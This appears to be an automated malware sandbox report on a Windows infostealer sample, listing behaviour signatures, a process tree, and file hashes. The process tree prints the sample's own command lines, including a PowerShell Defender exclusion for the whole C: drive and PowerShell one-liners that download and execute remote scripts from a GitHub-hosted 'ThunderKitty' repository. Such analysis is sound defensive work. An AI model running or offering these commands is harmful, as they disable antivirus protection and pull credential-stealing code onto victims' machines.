Analysis

  • max time kernel
    132s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/08/2024, 07:16

General

  • Target

    2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    d05c023eccc1da17f58c6e83fcb7a48d

  • SHA1

    0979e711d628aa30fc8c687799fd98799c4928a8

  • SHA256

    47ab7d1fae33e1ec1b456cbdc133738c7992af9a47c0638d3a365c2e609d09a2

  • SHA512

    b1358c4b0da40aa0fac3ab596b65d5e9c3b3dd9c4d6fb42e17c059b68ed0817ea839c546039f52cc7080b598f1107627ff515db7b34e916311c2b47f71eb376b

  • SSDEEP

    196608:GSG4xZcgzl5uvhHfIpHm9fD02kb/zIf8ryQ5S:GYxt5khHQpHm9fLkDzIfxA

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-27_d05c023eccc1da17f58c6e83fcb7a48d_poet-rat_snatch.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3836
    • C:\Windows\system32\cmd.exe
      cmd.exe /c start facebook.com
      2⤵
        PID:2660
      • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
        PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -C "Add-MpPreference -ExclusionPath 'C:'"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hajutsmr\hajutsmr.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4696
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82FB.tmp" "c:\Users\Admin\AppData\Local\Temp\hajutsmr\CSC3901D0A37DA7453BADD6F86AE6C545.TMP"
            4⤵
              PID:4880
        • C:\Windows\system32\cmd.exe
          cmd /c rundll32.exe user32.dll,SwapMouseButton
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4596
          • C:\Windows\system32\rundll32.exe
            rundll32.exe user32.dll,SwapMouseButton
            3⤵
              PID:4824
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
            2⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tebx1obz\tebx1obz.cmdline"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2444
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES831A.tmp" "c:\Users\Admin\AppData\Local\Temp\tebx1obz\CSC3EB262215D6349C29A9F45E0D57F80E4.TMP"
                4⤵
                  PID:4080
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" wlan show profiles
                3⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Network Configuration Discovery: Wi-Fi Discovery
                PID:2224
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup administrators
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4344
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup administrators
                  4⤵
                    PID:1448
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
                  3⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2960
                • C:\Windows\system32\whoami.exe
                  "C:\Windows\system32\whoami.exe" /all
                  3⤵
                    PID:1928
                  • C:\Windows\system32\net.exe
                    "C:\Windows\system32\net.exe" user
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4516
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 user
                      4⤵
                        PID:4532
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /displaydns
                      3⤵
                      • Gathers network information
                      PID:1656
                    • C:\Windows\system32\net.exe
                      "C:\Windows\system32\net.exe" localgroup
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1292
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 localgroup
                        4⤵
                          PID:2264
                      • C:\Windows\System32\Wbem\WMIC.exe
                        "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                        3⤵
                          PID:4136
                        • C:\Windows\system32\NETSTAT.EXE
                          "C:\Windows\system32\NETSTAT.EXE" -ano
                          3⤵
                          • System Network Connections Discovery
                          • Gathers network information
                          PID:4300
                        • C:\Windows\System32\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                          3⤵
                            PID:1288
                          • C:\Windows\system32\ipconfig.exe
                            "C:\Windows\system32\ipconfig.exe" /all
                            3⤵
                            • Gathers network information
                            PID:3216
                          • C:\Windows\system32\ROUTE.EXE
                            "C:\Windows\system32\ROUTE.EXE" print
                            3⤵
                              PID:3468
                            • C:\Windows\system32\ARP.EXE
                              "C:\Windows\system32\ARP.EXE" -a
                              3⤵
                              • Network Service Discovery
                              PID:2996
                            • C:\Windows\system32\netsh.exe
                              "C:\Windows\system32\netsh.exe" wlan show profile
                              3⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Network Configuration Discovery: Wi-Fi Discovery
                              PID:3228
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                            2⤵
                            • Views/modifies file attributes
                            PID:3952
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            PID:1692
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x498 0x490
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2716

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          652B

                          MD5

                          03ce749b9c7a14fb2dbcf9753857afac

                          SHA1

                          50e1f0f17c585720c61abf7bb10a038c7d8cdc38

                          SHA256

                          098397300d9cacd68ce8fc555d346a4dd4cee4f4b1567089f0364ad388bc5719

                          SHA512

                          794e7c7ab6ea6f86738d36dec12765ad133b18780ee6557d0ae0ecbb141c01d0bf1c4a60cc395d07b5d93d6a5d0a05acb29cee56c384511759ffe9691ca68190

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          5e621802b71e3ece88354ee557e1ce88

                          SHA1

                          0a7bb0acee1ebc8281bd24ef0084076e03f93e1f

                          SHA256

                          80a94ab0d20a51881a420cf64826b30e621d94245304be8b35af5cac389bc587

                          SHA512

                          31038c0107f0111eef87385a6ec7ef56ec9833fd5ef85187e58c9b32917ba8b90fb7c1bb2efbf273f1ee3a03744ca61d3f4d6f25029b9715eca216be2d80ef01

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          820128764c07552628e15dc57e1a2b89

                          SHA1

                          9613a355ee0f83dc8bc878997208feaaca245a14

                          SHA256

                          d56c95e8d92341bbc8138e44205c5b8c4719e74e7bd0e5bb96a995b2b5f4c9f9

                          SHA512

                          9dadd04db6371f855e316b995a76054f3062eeb9f78469ed52d9c7b140664c19c76230affc477e8e1ba8512e04ec656bf96cb294fa687470a8bffa519c4bef9d

                        • C:\Users\Admin\AppData\Local\Temp\RES82FB.tmp

                          Filesize

                          1KB

                          MD5

                          15be319dec9b3dd399bcaffd66cd9368

                          SHA1

                          715c8c745f88584c7f30746e58754f30685c88e1

                          SHA256

                          21a872e0b88ce8c220981a1dd369231d1a659df437f053f6f655a8b090032df3

                          SHA512

                          71d5c93bd36ac5e587c000d64549c2f4330ed3ff71481c95bc6a1b555eab28bb9765ca43a9c66cb2080784674e057ea7a36081f5530602689f056d3bfdc86328

                        • C:\Users\Admin\AppData\Local\Temp\RES831A.tmp

                          Filesize

                          1KB

                          MD5

                          3ad6e99e6a9caf1af6323c3d11abca0b

                          SHA1

                          2b082a17aff52c5cae7afe5f23e0a8d594b250fe

                          SHA256

                          d405d5fcf7b6089a50b77d3852644cadca6312ff389000ad7166413136e7ff7c

                          SHA512

                          320f20fd567260296bef6b41d19dd116a737d3459bed93828ec5041f1a4fe7f7e238bf07576381ad5f937d347e886b64a82543b1e0f9b7f509d6e38093070cd4

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          224KB

                          MD5

                          0ab335faf4325262347180da8a417bd8

                          SHA1

                          44982cdf5717e04ff5b451bfe351bbc86ecde73a

                          SHA256

                          b4be883212c2b826286e6216e968d117c958258c13237145d6452cf0c2cd17a2

                          SHA512

                          cb844be02d3b277275d813e92f03ebfc651e8521f82ccfd19e15a700bc878c0f7a3e63ea22f9bcd61240d9cb380e38c8430d0345e36265d4b00abd4890bd9dc5

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          24KB

                          MD5

                          e850e150d6fa1ec767573bbd82768e06

                          SHA1

                          8d3a6d685327efabf21e942b08792a8ff755ec42

                          SHA256

                          2a2c03595b0b98babef2c666f5f5bd967a8f4a80267e6f1ef0a9ea75823b4192

                          SHA512

                          286cc16a2ae804698b8dd078ce0c4f9be8df8a95378aa25f3b00138ebbb61020847f0b56dc98ecbd6d43f28a6945aac0bb9b9629aa837ddb27f86be0bbf5debb

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_is4lrulb.rjn.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\hajutsmr\hajutsmr.dll

                          Filesize

                          4KB

                          MD5

                          6d0cc4c55cf589255624635ae0f92900

                          SHA1

                          dcc4d20ef421249da7208213055ad43988fbd229

                          SHA256

                          73bad8ce4812723fa7e6903c44ca84c8a3d9b3f484217fa5d789bfb10c02c019

                          SHA512

                          a11d21bd10cf8a5f1bf768ec8ee1c354606e2aef436db3ac806a78ead710aff242bf15c663ff20da3f09e504ddfc1cdf45356b3e38e4fd81024ed611e150b19e

                        • C:\Users\Admin\AppData\Local\Temp\tebx1obz\tebx1obz.dll

                          Filesize

                          4KB

                          MD5

                          91774d2419deef0c2e68c565da484d74

                          SHA1

                          ad03f243ae7edaebb48894fd755e4e03d87b0b57

                          SHA256

                          e561b3acf7ac17858b9545a1d30cb40e3709f952ce6374fefe7ea5d801c698d3

                          SHA512

                          703cae4db296fd34f16ea40a1464837b07864e345b688b6995bdfc27c037e33e9181036f8596661748db87a8d71bba51ca95a1fc61115004a18d59fec9e5c76e

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • \??\c:\Users\Admin\AppData\Local\Temp\hajutsmr\CSC3901D0A37DA7453BADD6F86AE6C545.TMP

                          Filesize

                          652B

                          MD5

                          f0fd4bc7fb0ccac296a4fbd53467e865

                          SHA1

                          d62bc910282686b6413adc579b0b1bec92d6ab87

                          SHA256

                          652b3335ac06712edf297a0a508a7bcc062aa4c9597223f1796e0b1856c95d93

                          SHA512

                          3b719e994be0bb89c86754f2e079056d75d2de1818b2dce265ff16416a8590cf9ac8191a4dd4058b91b888d8cb7936ad374cd1139df1eb16a739c41cad1b2167

                        • \??\c:\Users\Admin\AppData\Local\Temp\hajutsmr\hajutsmr.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\hajutsmr\hajutsmr.cmdline

                          Filesize

                          369B

                          MD5

                          88587af39a0607534bf0189ce9a46204

                          SHA1

                          49b88878dd7af9c807213b53e243f553357952a3

                          SHA256

                          edd36260084845f0913620e8fdc5318c3f920222c655a5dff7c45c91f10323b4

                          SHA512

                          15a112385b2532e9ae92e62842147a88281b6681be819d02d8ebaef430d5376a2d2f0ee967ccc703fb0a89d13ccedd29eff134a3c14a17ed97d939aececea0a1

                        • \??\c:\Users\Admin\AppData\Local\Temp\tebx1obz\CSC3EB262215D6349C29A9F45E0D57F80E4.TMP

                          Filesize

                          652B

                          MD5

                          e946973b60f34a2effe33254e45f35ed

                          SHA1

                          36c28039f7bbaf15b7ae23d3e15851e812c3883c

                          SHA256

                          21fdd3c2906b575e367e15bc20a015364070e10e2129e3111c87f92d08a0a30c

                          SHA512

                          1914f7e1648b3b436776ce7763a04f9c7af9ea223f602bff6b9ac67022b84b5791d4615212d3a38fa0c796686dcdfb9c26a978e8c7b1dcf428a1a9219c78b7d7

                        • \??\c:\Users\Admin\AppData\Local\Temp\tebx1obz\tebx1obz.cmdline

                          Filesize

                          369B

                          MD5

                          7669e7b0f8f0cd744e419053ca91c1fb

                          SHA1

                          f1cbe83b3736c01e09d7d7976384cce8a00304bd

                          SHA256

                          43f443c0036480a27d7b750018edc33572fb0390c587fa02e4da9358db263cf2

                          SHA512

                          b0613a37fdc0d8e83b59471cecb4e66d54ba259fe55211561271c766237b462aa04ccbbcb7f6425236250913697592e57e0a632b4c3ffd929d3b26e92165a82e

                        • memory/2432-89-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2432-35-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2432-10-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2432-31-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2432-73-0x0000017A41CF0000-0x0000017A41CF8000-memory.dmp

                          Filesize

                          32KB

                        • memory/3904-34-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3904-0-0x00007FF8BD7B3000-0x00007FF8BD7B5000-memory.dmp

                          Filesize

                          8KB

                        • memory/3904-75-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3904-3-0x0000024C36EA0000-0x0000024C36EC2000-memory.dmp

                          Filesize

                          136KB

                        • memory/3904-1-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/5112-68-0x0000018BEFFD0000-0x0000018BEFFD8000-memory.dmp

                          Filesize

                          32KB

                        • memory/5112-94-0x0000018BF1080000-0x0000018BF10AA000-memory.dmp

                          Filesize

                          168KB

                        • memory/5112-95-0x0000018BF1080000-0x0000018BF10A4000-memory.dmp

                          Filesize

                          144KB

                        • memory/5112-83-0x0000018BF1660000-0x0000018BF1E06000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/5112-128-0x0000018BF1070000-0x0000018BF1082000-memory.dmp

                          Filesize

                          72KB

                        • memory/5112-129-0x0000018BF1060000-0x0000018BF106A000-memory.dmp

                          Filesize

                          40KB